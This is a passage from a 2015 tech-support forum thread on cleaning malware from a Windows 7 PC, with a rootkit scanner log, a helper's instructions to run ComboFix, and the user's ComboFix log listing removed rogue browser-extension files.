09:35:52.0199 0x0ff0  [ 2CE2DF28C83AEAF30084E1B1EB253CBB, D1946816A1CB89F825CBEA58F94A4C9D0CE7249355CD3915563F54054EE564BF ] vhdmp           C:\Windows\system32\drivers\vhdmp.sys
09:35:52.0210 0x0ff0  vhdmp - ok
09:35:52.0230 0x0ff0  [ E5689D93FFE4E5D66C0178761240DD54, 6D35CED80681B12AAF63BFA0DA1C386E71D3838839B68A686990AA8031949D27 ] viaide          C:\Windows\system32\drivers\viaide.sys
09:35:52.0238 0x0ff0  viaide - ok
09:35:52.0261 0x0ff0  [ 86EA3E79AE350FEA5331A1303054005F, 7E7D6027EB41E591633C7383A5D29A3BA8ECFC08C177D2BCF741EE27686B1691 ] vmbus           C:\Windows\system32\drivers\vmbus.sys
09:35:52.0272 0x0ff0  vmbus - ok
09:35:52.0282 0x0ff0  [ 7DE90B48F210D29649380545DB45A187, 09522F84285D62B961868DA98C40B82E746CA4D24A9780905673A2349D6B07F4 ] VMBusHID        C:\Windows\system32\drivers\VMBusHID.sys
09:35:52.0290 0x0ff0  VMBusHID - ok
09:35:52.0309 0x0ff0  [ D2AAFD421940F640B407AEFAAEBD91B0, 31EF342A60AF04F4108759A71F8FB7B8C8819216CF3D16A95B2BA0E33A8A9161 ] volmgr          C:\Windows\system32\drivers\volmgr.sys
09:35:52.0317 0x0ff0  volmgr - ok
09:35:52.0335 0x0ff0  [ A255814907C89BE58B79EF2F189B843B, 463DB771851352185B6AC323BD93B9084D47291E53C1F7B628B65D6918B2E28F ] volmgrx         C:\Windows\system32\drivers\volmgrx.sys
09:35:52.0349 0x0ff0  volmgrx - ok
09:35:52.0367 0x0ff0  [ 0D08D2F3B3FF84E433346669B5E0F639, 3D6716CEC95B8861A7CC5778E91F310528DC6BEE0E57A3C8757FC675154EBDEC ] volsnap         C:\Windows\system32\drivers\volsnap.sys
09:35:52.0379 0x0ff0  volsnap - ok
09:35:52.0398 0x0ff0  [ 5E2016EA6EBACA03C04FEAC5F330D997, 53106EB877459FE55A459111F7AB0EE320BB3B4C954D3DB6FA1642396001F2AC ] vsmraid         C:\Windows\system32\drivers\vsmraid.sys
09:35:52.0409 0x0ff0  vsmraid - ok
09:35:52.0452 0x0ff0  [ B60BA0BC31B0CB414593E169F6F21CC2, 47B801E623254CF0202B3591CB5C019CABFB52F123C7D47E29D19B32F1F2B915 ] VSS             C:\Windows\system32\vssvc.exe
09:35:52.0530 0x0ff0  VSS - ok
09:35:52.0537 0x0ff0  [ 36D4720B72B5C5D9CB2B9C29E9DF67A1, 3254523C85C70EBA2DBAC05DB2DBA89EDF8E9195F390F7C21F96458FB6B2E3D7 ] vwifibus        C:\Windows\System32\drivers\vwifibus.sys
09:35:52.0562 0x0ff0  vwifibus - ok
09:35:52.0580 0x0ff0  [ 1C9D80CC3849B3788048078C26486E1A, 34A89F31E53F6B6C209B286F580CC2257AE6D057E4E20741F241C9C167947962 ] W32Time         C:\Windows\system32\w32time.dll
09:35:52.0610 0x0ff0  W32Time - ok
09:35:52.0625 0x0ff0  [ 4E9440F4F152A7B944CB1663D3935A3E, 8FE04EBD3BC612EE943A21A3E56F37E5C9B578CDACA6044048181DAD81816D53 ] WacomPen        C:\Windows\system32\drivers\wacompen.sys
09:35:52.0638 0x0ff0  WacomPen - ok
09:35:52.0648 0x0ff0  [ 356AFD78A6ED4457169241AC3965230C, CE4D1EE3525C10AC658B20776C3E444DE44874C837713DC5311386EDFCB18399 ] WANARP          C:\Windows\system32\DRIVERS\wanarp.sys
09:35:52.0677 0x0ff0  WANARP - ok
09:35:52.0680 0x0ff0  [ 356AFD78A6ED4457169241AC3965230C, CE4D1EE3525C10AC658B20776C3E444DE44874C837713DC5311386EDFCB18399 ] Wanarpv6        C:\Windows\system32\DRIVERS\wanarp.sys
09:35:52.0701 0x0ff0  Wanarpv6 - ok
09:35:52.0765 0x0ff0  [ 3CEC96DE223E49EAAE3651FCF8FAEA6C, 4150DAB33E8D61076F1D4767BCAFC9B4ECCCCBD58FD4FB3CFE5B8D27DCDCAB61 ] WatAdminSvc     C:\Windows\system32\Wat\WatAdminSvc.exe
09:35:52.0808 0x0ff0  WatAdminSvc - ok
09:35:52.0858 0x0ff0  [ 78F4E7F5C56CB9716238EB57DA4B6A75, 46A4E78CE5F2A4B26F4E9C3FF04A99D9B727A82AC2E390A82A1611C3F6E0C9AF ] wbengine        C:\Windows\system32\wbengine.exe
09:35:52.0918 0x0ff0  wbengine - ok
09:35:52.0924 0x0ff0  [ 3AA101E8EDAB2DB4131333F4325C76A3, 4F7BD3DA5E58B18BFF106CFF7B45E75FD13EE556D433C695BA23EC80827E49DE ] WbioSrvc        C:\Windows\System32\wbiosrvc.dll
09:35:52.0939 0x0ff0  WbioSrvc - ok
09:35:52.0980 0x0ff0  [ 7368A2AFD46E5A4481D1DE9D14848EDD, 8039C478FC2D9F095F5883A4FA47F9E6EDF57CC88A4AA74F07C88445F90DED57 ] wcncsvc         C:\Windows\System32\wcncsvc.dll
09:35:53.0002 0x0ff0  wcncsvc - ok
09:35:53.0016 0x0ff0  [ 20F7441334B18CEE52027661DF4A6129, 7B8E0247234B740FED2BE9B833E9CE8DD7453340123AB43F6B495A7E6A27B0DD ] WcsPlugInService C:\Windows\System32\WcsPlugInService.dll
09:35:53.0024 0x0ff0  WcsPlugInService - ok
09:35:53.0034 0x0ff0  [ 72889E16FF12BA0F235467D6091B17DC, F2FD0BBD075E33608D93F350D216F97442AB89ABD540513C2D568C78096E12A8 ] Wd              C:\Windows\system32\drivers\wd.sys
09:35:53.0042 0x0ff0  Wd - ok
09:35:53.0090 0x0ff0  [ E2C933EDBC389386EBE6D2BA953F43D8, AF1DEADD5F1267CCEBD226E8EEB971D1946EA6A5A9645A36F5D111F758AF2F07 ] Wdf01000        C:\Windows\system32\drivers\Wdf01000.sys
09:35:53.0113 0x0ff0  Wdf01000 - ok
09:35:53.0126 0x0ff0  [ BF1FC3F79B863C914687A737C2F3D681, B2DF47AC4931ACFB243775767B77065CC0D98778FC0243C793A3E219EB961209 ] WdiServiceHost  C:\Windows\system32\wdi.dll
09:35:53.0145 0x0ff0  WdiServiceHost - ok
09:35:53.0148 0x0ff0  [ BF1FC3F79B863C914687A737C2F3D681, B2DF47AC4931ACFB243775767B77065CC0D98778FC0243C793A3E219EB961209 ] WdiSystemHost   C:\Windows\system32\wdi.dll
09:35:53.0159 0x0ff0  WdiSystemHost - ok
09:35:53.0177 0x0ff0  [ 0EB0E5D22B1760F2DBCE632F2DD7A54D, B8A4CC62F88768947FB0A161CF9564DB28FD9C1C037B5475DF192982DE035C22 ] WebClient       C:\Windows\System32\webclnt.dll
09:35:53.0190 0x0ff0  WebClient - ok
09:35:53.0198 0x0ff0  [ C749025A679C5103E575E3B48E092C43, B71171D07EE7AB085A24BF3A1072FF2CE7EA021AAE695F6A90640E6EE8EB55C1 ] Wecsvc          C:\Windows\system32\wecsvc.dll
09:35:53.0231 0x0ff0  Wecsvc - ok
09:35:53.0240 0x0ff0  [ 7E591867422DC788B9E5BD337A669A08, 484E6BCCDF7ADCE9A1AACAD1BC7C7D7694B9E40FA90D94B14D80C607784F6C75 ] wercplsupport   C:\Windows\System32\wercplsupport.dll
09:35:53.0263 0x0ff0  wercplsupport - ok
09:35:53.0278 0x0ff0  [ 6D137963730144698CBD10F202E9F251, A9F522A125158D94F540544CCD4DBF47B9DCE2EA878C33675AFE40F80E8F4979 ] WerSvc          C:\Windows\System32\WerSvc.dll
09:35:53.0307 0x0ff0  WerSvc - ok
09:35:53.0324 0x0ff0  [ 611B23304BF067451A9FDEE01FBDD725, 0AF2734B978165FC6FD22B64862132CCE32528A21C698A49D176129446E099C8 ] WfpLwf          C:\Windows\system32\DRIVERS\wfplwf.sys
09:35:53.0345 0x0ff0  WfpLwf - ok
09:35:57.0751 0x0ff0  [ ADA26465D52A50A34CDBC5B785035EE6, E93B8E90743EC71E74A976CFF1828EB581CFCDB1F6018AE390D6610E10DA881D ] C:\Program Files (x86)\Creative\Shared Files\CTSched.exe
09:35:57.0754 0x0ff0  CreativeTaskScheduler - detected UnsignedFile.Multi.Generic ( 1 )
09:36:00.0525 0x0ff0  Detect skipped due to KSN trusted
09:36:00.0525 0x0ff0  CreativeTaskScheduler - ok
09:36:08.0385 0x0ff0  AV detected via SS2: Microsoft Security Essentials, C:\Program Files\Microsoft Security Client\msseces.exe ( 4.6.305.0 ), 0x61000 ( enabled : updated )
09:36:08.0387 0x0ff0  Win FW state via NFP2: enabled ( trusted )
09:36:11.0212 0x0ff0  ============================================================
09:36:11.0212 0x0ff0  Scan finished
09:36:11.0212 0x0ff0  ============================================================
09:36:11.0217 0x18fc  Detected object count: 0
09:36:11.0217 0x18fc  Actual detected object count: 0
 



#6 deeprybka

  • Malware Response Team

Posted 11 October 2015 - 09:39 AM

Hello again :)

 

Step 1

Please download Combofix (by sUBs) and save it to your Desktop.

  • Disable the realtime-protection of your antivirus and anti-malware programs because they might interfere with the scan.
  • Start Combofix.exe and follow its instructions.
  • Do not use the computer while the scan is running. This may cause the program to stall.
  • When finished, a log file will be displayed (that can also be found at C:\Combofix.txt).
    Please copy and paste the contents of this file into your next post.

Note: If you receive an error "Illegal operation attempted on a registry key that has been marked for deletion." after the scan, just restart the computer.
(You can find more detailed instructions in this guide on using Combofix.)


regards,
deeprybka
Neminem laede, immo omnes, quantum potes, iuva. Arthur Schopenhauer
 

#7 Rainsford

  • Topic Starter

  • Members

Posted 11 October 2015 - 10:03 AM

Here you are!

 

ComboFix 15-10-09.01 - Rainsford 10/11/2015   9:55.1.12 - x64
Microsoft Windows 7 Ultimate   6.1.7601.1.1252.1.1033.18.12279.8938 [GMT -5:00]
Running from: c:\users\Rainsford\Desktop\ComboFix.exe
AV: Microsoft Security Essentials *Disabled/Updated* {4F35CFC4-45A3-FC37-EF17-759A02E39AB1}
SP: Microsoft Security Essentials *Disabled/Updated* {F4542E20-6399-F3B9-D5A7-4EE87964D00C}
SP: Windows Defender *Disabled/Outdated* {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
.
.
(((((((((((((((((((((((((((((((((((((((   Other Deletions   )))))))))))))))))))))))))))))))))))))))))))))))))
.
.
c:\users\Administrator\AppData\Local\Comodo\Dragon\User Data\Default\Extensions\dofeolkodenpakpecclcppljibhmbeam
c:\users\Administrator\AppData\Local\Comodo\Dragon\User Data\Default\Extensions\dofeolkodenpakpecclcppljibhmbeam\1.0\background.html
c:\users\Administrator\AppData\Local\Comodo\Dragon\User Data\Default\Extensions\dofeolkodenpakpecclcppljibhmbeam\1.0\content.js
c:\users\Administrator\AppData\Local\Comodo\Dragon\User Data\Default\Extensions\dofeolkodenpakpecclcppljibhmbeam\1.0\k9OmTM.js
c:\users\Administrator\AppData\Local\Comodo\Dragon\User Data\Default\Extensions\dofeolkodenpakpecclcppljibhmbeam\1.0\lsdb.js
c:\users\Administrator\AppData\Local\Comodo\Dragon\User Data\Default\Extensions\dofeolkodenpakpecclcppljibhmbeam\1.0\manifest.json
c:\users\Administrator\AppData\Local\Comodo\Dragon\User Data\Default\Extensions\ibafobgmkbhcmfacpkkmfoehplhhcplc
c:\users\Administrator\AppData\Local\Comodo\Dragon\User Data\Default\Extensions\ibafobgmkbhcmfacpkkmfoehplhhcplc\1.1\background.html
c:\users\Administrator\AppData\Local\Comodo\Dragon\User Data\Default\Extensions\ibafobgmkbhcmfacpkkmfoehplhhcplc\1.1\content.js
c:\users\Administrator\AppData\Local\Comodo\Dragon\User Data\Default\Extensions\ibafobgmkbhcmfacpkkmfoehplhhcplc\1.1\lsdb.js
c:\users\Administrator\AppData\Local\Comodo\Dragon\User Data\Default\Extensions\ibafobgmkbhcmfacpkkmfoehplhhcplc\1.1\manifest.json
c:\users\Administrator\AppData\Local\Comodo\Dragon\User Data\Default\Extensions\ibafobgmkbhcmfacpkkmfoehplhhcplc\1.1\QWhBv4.js
c:\users\Administrator\AppData\Local\Google\Chrome SxS\User Data\Default\Extensions\dofeolkodenpakpecclcppljibhmbeam
c:\users\Administrator\AppData\Local\Google\Chrome SxS\User Data\Default\Extensions\dofeolkodenpakpecclcppljibhmbeam\1.0\background.html
c:\users\Administrator\AppData\Local\Google\Chrome SxS\User Data\Default\Extensions\dofeolkodenpakpecclcppljibhmbeam\1.0\content.js
c:\users\Administrator\AppData\Local\Google\Chrome SxS\User Data\Default\Extensions\dofeolkodenpakpecclcppljibhmbeam\1.0\k9OmTM.js
c:\users\Administrator\AppData\Local\Google\Chrome SxS\User Data\Default\Extensions\dofeolkodenpakpecclcppljibhmbeam\1.0\lsdb.js
c:\users\Administrator\AppData\Local\Google\Chrome SxS\User Data\Default\Extensions\dofeolkodenpakpecclcppljibhmbeam\1.0\manifest.json
c:\users\Administrator\AppData\Local\Google\Chrome SxS\User Data\Default\Extensions\ibafobgmkbhcmfacpkkmfoehplhhcplc
c:\users\Administrator\AppData\Local\Google\Chrome SxS\User Data\Default\Extensions\ibafobgmkbhcmfacpkkmfoehplhhcplc\1.1\background.html
c:\users\Administrator\AppData\Local\Google\Chrome SxS\User Data\Default\Extensions\ibafobgmkbhcmfacpkkmfoehplhhcplc\1.1\content.js
c:\users\Administrator\AppData\Local\Google\Chrome SxS\User Data\Default\Extensions\ibafobgmkbhcmfacpkkmfoehplhhcplc\1.1\lsdb.js
c:\users\Administrator\AppData\Local\Google\Chrome SxS\User Data\Default\Extensions\ibafobgmkbhcmfacpkkmfoehplhhcplc\1.1\manifest.json
c:\users\Administrator\AppData\Local\Google\Chrome SxS\User Data\Default\Extensions\ibafobgmkbhcmfacpkkmfoehplhhcplc\1.1\QWhBv4.js
c:\users\Administrator\AppData\Local\Torch\User Data\Default\Extensions\dofeolkodenpakpecclcppljibhmbeam
c:\users\Administrator\AppData\Local\Torch\User Data\Default\Extensions\dofeolkodenpakpecclcppljibhmbeam\1.0\background.html
c:\users\Administrator\AppData\Local\Torch\User Data\Default\Extensions\dofeolkodenpakpecclcppljibhmbeam\1.0\content.js
c:\users\Administrator\AppData\Local\Torch\User Data\Default\Extensions\dofeolkodenpakpecclcppljibhmbeam\1.0\k9OmTM.js
c:\users\Administrator\AppData\Local\Torch\User Data\Default\Extensions\dofeolkodenpakpecclcppljibhmbeam\1.0\lsdb.js
c:\users\Administrator\AppData\Local\Torch\User Data\Default\Extensions\dofeolkodenpakpecclcppljibhmbeam\1.0\manifest.json
c:\users\Administrator\AppData\Local\Torch\User Data\Default\Extensions\ibafobgmkbhcmfacpkkmfoehplhhcplc
c:\users\Administrator\AppData\Local\Torch\User Data\Default\Extensions\ibafobgmkbhcmfacpkkmfoehplhhcplc\1.1\background.html
c:\users\Administrator\AppData\Local\Torch\User Data\Default\Extensions\ibafobgmkbhcmfacpkkmfoehplhhcplc\1.1\content.js
c:\users\Administrator\AppData\Local\Torch\User Data\Default\Extensions\ibafobgmkbhcmfacpkkmfoehplhhcplc\1.1\lsdb.js
c:\users\Administrator\AppData\Local\Torch\User Data\Default\Extensions\ibafobgmkbhcmfacpkkmfoehplhhcplc\1.1\manifest.json
c:\users\Administrator\AppData\Local\Torch\User Data\Default\Extensions\ibafobgmkbhcmfacpkkmfoehplhhcplc\1.1\QWhBv4.js
c:\users\Guest\AppData\Local\Comodo\Dragon\User Data\Default\Extensions\dofeolkodenpakpecclcppljibhmbeam
c:\users\Guest\AppData\Local\Comodo\Dragon\User Data\Default\Extensions\dofeolkodenpakpecclcppljibhmbeam\1.0\background.html
c:\users\Guest\AppData\Local\Comodo\Dragon\User Data\Default\Extensions\dofeolkodenpakpecclcppljibhmbeam\1.0\content.js
c:\users\Guest\AppData\Local\Comodo\Dragon\User Data\Default\Extensions\dofeolkodenpakpecclcppljibhmbeam\1.0\k9OmTM.js
c:\users\Guest\AppData\Local\Comodo\Dragon\User Data\Default\Extensions\dofeolkodenpakpecclcppljibhmbeam\1.0\lsdb.js
c:\users\Guest\AppData\Local\Comodo\Dragon\User Data\Default\Extensions\dofeolkodenpakpecclcppljibhmbeam\1.0\manifest.json
c:\users\Guest\AppData\Local\Comodo\Dragon\User Data\Default\Extensions\ibafobgmkbhcmfacpkkmfoehplhhcplc
c:\users\Guest\AppData\Local\Comodo\Dragon\User Data\Default\Extensions\ibafobgmkbhcmfacpkkmfoehplhhcplc\1.1\background.html
c:\users\Guest\AppData\Local\Comodo\Dragon\User Data\Default\Extensions\ibafobgmkbhcmfacpkkmfoehplhhcplc\1.1\content.js
c:\users\Guest\AppData\Local\Comodo\Dragon\User Data\Default\Extensions\ibafobgmkbhcmfacpkkmfoehplhhcplc\1.1\lsdb.js
c:\users\Guest\AppData\Local\Comodo\Dragon\User Data\Default\Extensions\ibafobgmkbhcmfacpkkmfoehplhhcplc\1.1\manifest.json
c:\users\Guest\AppData\Local\Comodo\Dragon\User Data\Default\Extensions\ibafobgmkbhcmfacpkkmfoehplhhcplc\1.1\QWhBv4.js
c:\users\Guest\AppData\Local\Google\Chrome SxS\User Data\Default\Extensions\dofeolkodenpakpecclcppljibhmbeam
c:\users\Guest\AppData\Local\Google\Chrome SxS\User Data\Default\Extensions\dofeolkodenpakpecclcppljibhmbeam\1.0\background.html
c:\users\Guest\AppData\Local\Google\Chrome SxS\User Data\Default\Extensions\dofeolkodenpakpecclcppljibhmbeam\1.0\content.js
c:\users\Guest\AppData\Local\Google\Chrome SxS\User Data\Default\Extensions\dofeolkodenpakpecclcppljibhmbeam\1.0\k9OmTM.js
c:\users\Guest\AppData\Local\Google\Chrome SxS\User Data\Default\Extensions\dofeolkodenpakpecclcppljibhmbeam\1.0\lsdb.js
c:\users\Guest\AppData\Local\Google\Chrome SxS\User Data\Default\Extensions\dofeolkodenpakpecclcppljibhmbeam\1.0\manifest.json
c:\users\Guest\AppData\Local\Google\Chrome SxS\User Data\Default\Extensions\ibafobgmkbhcmfacpkkmfoehplhhcplc
c:\users\Guest\AppData\Local\Google\Chrome SxS\User Data\Default\Extensions\ibafobgmkbhcmfacpkkmfoehplhhcplc\1.1\background.html
c:\users\Guest\AppData\Local\Google\Chrome SxS\User Data\Default\Extensions\ibafobgmkbhcmfacpkkmfoehplhhcplc\1.1\content.js
c:\users\Guest\AppData\Local\Google\Chrome SxS\User Data\Default\Extensions\ibafobgmkbhcmfacpkkmfoehplhhcplc\1.1\lsdb.js
c:\users\Guest\AppData\Local\Google\Chrome SxS\User Data\Default\Extensions\ibafobgmkbhcmfacpkkmfoehplhhcplc\1.1\manifest.json
c:\users\Guest\AppData\Local\Google\Chrome SxS\User Data\Default\Extensions\ibafobgmkbhcmfacpkkmfoehplhhcplc\1.1\QWhBv4.js
c:\users\Guest\AppData\Local\Torch\User Data\Default\Extensions\dofeolkodenpakpecclcppljibhmbeam
c:\users\Guest\AppData\Local\Torch\User Data\Default\Extensions\dofeolkodenpakpecclcppljibhmbeam\1.0\background.html
c:\users\Guest\AppData\Local\Torch\User Data\Default\Extensions\dofeolkodenpakpecclcppljibhmbeam\1.0\content.js
c:\users\Guest\AppData\Local\Torch\User Data\Default\Extensions\dofeolkodenpakpecclcppljibhmbeam\1.0\k9OmTM.js
c:\users\Guest\AppData\Local\Torch\User Data\Default\Extensions\dofeolkodenpakpecclcppljibhmbeam\1.0\lsdb.js
c:\users\Guest\AppData\Local\Torch\User Data\Default\Extensions\dofeolkodenpakpecclcppljibhmbeam\1.0\manifest.json
c:\users\Guest\AppData\Local\Torch\User Data\Default\Extensions\ibafobgmkbhcmfacpkkmfoehplhhcplc
c:\users\Guest\AppData\Local\Torch\User Data\Default\Extensions\ibafobgmkbhcmfacpkkmfoehplhhcplc\1.1\background.html
c:\users\Guest\AppData\Local\Torch\User Data\Default\Extensions\ibafobgmkbhcmfacpkkmfoehplhhcplc\1.1\content.js
c:\users\Guest\AppData\Local\Torch\User Data\Default\Extensions\ibafobgmkbhcmfacpkkmfoehplhhcplc\1.1\lsdb.js
c:\users\Guest\AppData\Local\Torch\User Data\Default\Extensions\ibafobgmkbhcmfacpkkmfoehplhhcplc\1.1\manifest.json
c:\users\Guest\AppData\Local\Torch\User Data\Default\Extensions\ibafobgmkbhcmfacpkkmfoehplhhcplc\1.1\QWhBv4.js
c:\users\Rainsford\AppData\Local\Comodo\Dragon\User Data\Default\Extensions\dofeolkodenpakpecclcppljibhmbeam
c:\users\Rainsford\AppData\Local\Comodo\Dragon\User Data\Default\Extensions\dofeolkodenpakpecclcppljibhmbeam\1.0\background.html
c:\users\Rainsford\AppData\Local\Comodo\Dragon\User Data\Default\Extensions\dofeolkodenpakpecclcppljibhmbeam\1.0\content.js
c:\users\Rainsford\AppData\Local\Comodo\Dragon\User Data\Default\Extensions\dofeolkodenpakpecclcppljibhmbeam\1.0\k9OmTM.js
c:\users\Rainsford\AppData\Local\Comodo\Dragon\User Data\Default\Extensions\dofeolkodenpakpecclcppljibhmbeam\1.0\lsdb.js
c:\users\Rainsford\AppData\Local\Comodo\Dragon\User Data\Default\Extensions\dofeolkodenpakpecclcppljibhmbeam\1.0\manifest.json
c:\users\Rainsford\AppData\Local\Comodo\Dragon\User Data\Default\Extensions\ibafobgmkbhcmfacpkkmfoehplhhcplc
c:\users\Rainsford\AppData\Local\Comodo\Dragon\User Data\Default\Extensions\ibafobgmkbhcmfacpkkmfoehplhhcplc\1.1\background.html
c:\users\Rainsford\AppData\Local\Comodo\Dragon\User Data\Default\Extensions\ibafobgmkbhcmfacpkkmfoehplhhcplc\1.1\content.js
c:\users\Rainsford\AppData\Local\Comodo\Dragon\User Data\Default\Extensions\ibafobgmkbhcmfacpkkmfoehplhhcplc\1.1\lsdb.js
c:\users\Rainsford\AppData\Local\Comodo\Dragon\User Data\Default\Extensions\ibafobgmkbhcmfacpkkmfoehplhhcplc\1.1\manifest.json
c:\users\Rainsford\AppData\Local\Comodo\Dragon\User Data\Default\Extensions\ibafobgmkbhcmfacpkkmfoehplhhcplc\1.1\QWhBv4.js
c:\users\Rainsford\AppData\Local\Google\Chrome SxS\User Data\Default\Extensions\dofeolkodenpakpecclcppljibhmbeam
c:\users\Rainsford\AppData\Local\Google\Chrome SxS\User Data\Default\Extensions\dofeolkodenpakpecclcppljibhmbeam\1.0\background.html
c:\users\Rainsford\AppData\Local\Google\Chrome SxS\User Data\Default\Extensions\dofeolkodenpakpecclcppljibhmbeam\1.0\content.js
c:\users\Rainsford\AppData\Local\Google\Chrome SxS\User Data\Default\Extensions\dofeolkodenpakpecclcppljibhmbeam\1.0\k9OmTM.js
c:\users\Rainsford\AppData\Local\Google\Chrome SxS\User Data\Default\Extensions\dofeolkodenpakpecclcppljibhmbeam\1.0\lsdb.js
c:\users\Rainsford\AppData\Local\Google\Chrome SxS\User Data\Default\Extensions\dofeolkodenpakpecclcppljibhmbeam\1.0\manifest.json
c:\users\Rainsford\AppData\Local\Google\Chrome SxS\User Data\Default\Extensions\ibafobgmkbhcmfacpkkmfoehplhhcplc
c:\users\Rainsford\AppData\Local\Google\Chrome SxS\User Data\Default\Extensions\ibafobgmkbhcmfacpkkmfoehplhhcplc\1.1\background.html
c:\users\Rainsford\AppData\Local\Google\Chrome SxS\User Data\Default\Extensions\ibafobgmkbhcmfacpkkmfoehplhhcplc\1.1\content.js
c:\users\Rainsford\AppData\Local\Google\Chrome SxS\User Data\Default\Extensions\ibafobgmkbhcmfacpkkmfoehplhhcplc\1.1\lsdb.js
c:\users\Rainsford\AppData\Local\Google\Chrome SxS\User Data\Default\Extensions\ibafobgmkbhcmfacpkkmfoehplhhcplc\1.1\manifest.json
c:\users\Rainsford\AppData\Local\Google\Chrome SxS\User Data\Default\Extensions\ibafobgmkbhcmfacpkkmfoehplhhcplc\1.1\QWhBv4.js
c:\users\Rainsford\AppData\Local\Google\Chrome\User Data\Default\Preferences
c:\users\Rainsford\AppData\Local\Torch\User Data\Default\Extensions\dofeolkodenpakpecclcppljibhmbeam
c:\users\Rainsford\AppData\Local\Torch\User Data\Default\Extensions\dofeolkodenpakpecclcppljibhmbeam\1.0\background.html
c:\users\Rainsford\AppData\Local\Torch\User Data\Default\Extensions\dofeolkodenpakpecclcppljibhmbeam\1.0\content.js
c:\users\Rainsford\AppData\Local\Torch\User Data\Default\Extensions\dofeolkodenpakpecclcppljibhmbeam\1.0\k9OmTM.js
c:\users\Rainsford\AppData\Local\Torch\User Data\Default\Extensions\dofeolkodenpakpecclcppljibhmbeam\1.0\lsdb.js
c:\users\Rainsford\AppData\Local\Torch\User Data\Default\Extensions\dofeolkodenpakpecclcppljibhmbeam\1.0\manifest.json
c:\users\Rainsford\AppData\Local\Torch\User Data\Default\Extensions\ibafobgmkbhcmfacpkkmfoehplhhcplc
c:\users\Rainsford\AppData\Local\Torch\User Data\Default\Extensions\ibafobgmkbhcmfacpkkmfoehplhhcplc\1.1\background.html
c:\users\Rainsford\AppData\Local\Torch\User Data\Default\Extensions\ibafobgmkbhcmfacpkkmfoehplhhcplc\1.1\content.js
c:\users\Rainsford\AppData\Local\Torch\User Data\Default\Extensions\ibafobgmkbhcmfacpkkmfoehplhhcplc\1.1\lsdb.js
c:\users\Rainsford\AppData\Local\Torch\User Data\Default\Extensions\ibafobgmkbhcmfacpkkmfoehplhhcplc\1.1\manifest.json
c:\users\Rainsford\AppData\Local\Torch\User Data\Default\Extensions\ibafobgmkbhcmfacpkkmfoehplhhcplc\1.1\QWhBv4.js
c:\windows\apppatch\AppLoc.exe
c:\windows\AppPatch\Custom\{deb7008b-681e-4a4a-8aae-cc833e8216ce}.sdb
c:\windows\msdownld.tmp
.
.
(((((((((((((((((((((((((   Files Created from 2015-09-11 to 2015-10-11  )))))))))))))))))))))))))))))))
.
.
2015-10-11 14:59 . 2015-10-11 14:59    --------    d-----w-    c:\users\Default\AppData\Local\temp
2015-10-11 14:40 . 2015-08-31 22:45    11062400    ----a-w-    c:\programdata\Microsoft\Microsoft Antimalware\Definition Updates\{EDD2D79D-8030-4224-9178-6694C3EA8CC2}\mpengine.dll
2015-10-11 00:34 . 2015-10-11 00:36    --------    d-----w-    C:\FRST
2015-10-10 02:06 . 2015-08-31 22:45    11062400    ----a-w-    c:\programdata\Microsoft\Microsoft Antimalware\Definition Updates\Backup\mpengine.dll
2015-10-07 18:29 . 2015-10-08 18:56    --------    d-----w-    c:\users\Rainsford\AppData\Roaming\PixelPiracy
2015-10-01 20:22 . 2015-10-01 20:22    --------    d-----w-    C:\Steam
2015-09-24 20:49 . 2015-09-24 20:49    --------    d-----w-    c:\program files\7-Zip
2015-09-23 18:06 . 2015-09-23 18:06    --------    d-----w-    C:\ArcheAge
2015-09-23 16:05 . 2015-07-01 01:39    1190000    ----a-w-    c:\programdata\Microsoft\Microsoft Antimalware\Definition Updates\{CF0494F5-3553-492D-A7FE-ED068F101F3F}\gapaengine.dll
2015-09-23 15:41 . 2015-10-10 00:59    --------    d-----w-    c:\program files (x86)\Glyph
2015-09-18 02:32 . 2015-09-18 02:32    --------    d-----w-    c:\program files (x86)\Corsair
.
.
.
((((((((((((((((((((((((((((((((((((((((   Find3M Report   ))))))))))))))))))))))))))))))))))))))))))))))))))))
.
2015-10-10 01:51 . 2015-08-26 23:51    113880    ----a-w-    c:\windows\system32\drivers\MBAMSwissArmy.sys
2015-10-03 02:54 . 2015-06-16 04:38    780488    ----a-w-    c:\windows\SysWow64\FlashPlayerApp.exe
2015-10-03 02:54 . 2015-06-16 04:38    142536    ----a-w-    c:\windows\SysWow64\FlashPlayerCPLApp.cpl
2015-08-27 00:37 . 2015-08-26 23:34    1423120    ----a-w-    c:\windows\SysWow64\nvspcap.dll
2015-08-27 00:37 . 2015-08-26 23:34    1316000    ----a-w-    c:\windows\SysWow64\nvspbridge.dll
2015-08-27 00:36 . 2015-08-26 23:34    1756424    ----a-w-    c:\windows\system32\nvspbridge64.dll
2015-08-27 00:36 . 2015-08-26 23:34    1710568    ----a-w-    c:\windows\system32\nvspcap64.dll
2015-08-25 18:46 . 2015-09-01 21:10    112760    ----a-w-    c:\windows\system32\OpenCL.dll
2015-08-25 18:46 . 2015-09-01 21:10    105264    ----a-w-    c:\windows\SysWow64\OpenCL.dll
2015-08-25 18:46 . 2015-09-01 21:09    40280    ----a-w-    c:\windows\system32\nvhdap64.dll
2015-08-25 18:46 . 2015-09-01 21:09    204648    ----a-w-    c:\windows\system32\drivers\nvhda64v.sys
2015-08-25 18:46 . 2015-09-01 21:09    1567576    ----a-w-    c:\windows\system32\nvhdagenco6420103.dll
2015-08-25 18:46 . 2015-09-01 21:09    986232    ----a-w-    c:\windows\SysWow64\NvIFR.dll
2015-08-25 18:46 . 2015-09-01 21:09    945456    ----a-w-    c:\windows\SysWow64\NvFBC.dll
2015-08-25 18:46 . 2015-09-01 21:09    944736    ----a-w-    c:\windows\SysWow64\nvumdshim.dll
2015-08-25 18:46 . 2015-09-01 21:09    512904    ----a-w-    c:\windows\system32\nvEncodeAPI64.dll
2015-08-25 18:46 . 2015-09-01 21:09    42840368    ----a-w-    c:\windows\system32\nvcompiler.dll
2015-08-25 18:46 . 2015-09-01 21:09    421544    ----a-w-    c:\windows\SysWow64\nvEncodeAPI.dll
2015-08-25 18:46 . 2015-09-01 21:09    408184    ----a-w-    c:\windows\system32\NvIFROpenGL.dll
2015-08-25 18:46 . 2015-09-01 21:09    37819184    ----a-w-    c:\windows\SysWow64\nvcompiler.dll
2015-08-25 18:46 . 2015-09-01 21:09    364336    ----a-w-    c:\windows\SysWow64\NvIFROpenGL.dll
2015-08-25 18:46 . 2015-09-01 21:09    3527696    ----a-w-    c:\windows\system32\nvapi64.dll
2015-08-25 18:46 . 2015-09-01 21:09    3112904    ----a-w-    c:\windows\SysWow64\nvapi.dll
2015-08-25 18:46 . 2015-09-01 21:09    2940720    ----a-w-    c:\windows\system32\nvcuvid.dll
